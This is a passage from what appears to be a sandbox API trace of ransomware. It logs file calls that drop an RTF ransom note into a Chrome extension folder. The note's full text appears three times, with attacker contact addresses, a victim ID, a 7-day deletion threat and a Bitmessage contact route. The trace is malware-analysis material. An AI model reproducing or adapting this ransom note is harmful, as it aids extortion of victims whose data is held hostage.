(lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\#readme_eman#.rtf")) returned 0xffffffff [0281.654] GetLastError () returned 0x2 [0281.654] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0281.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring 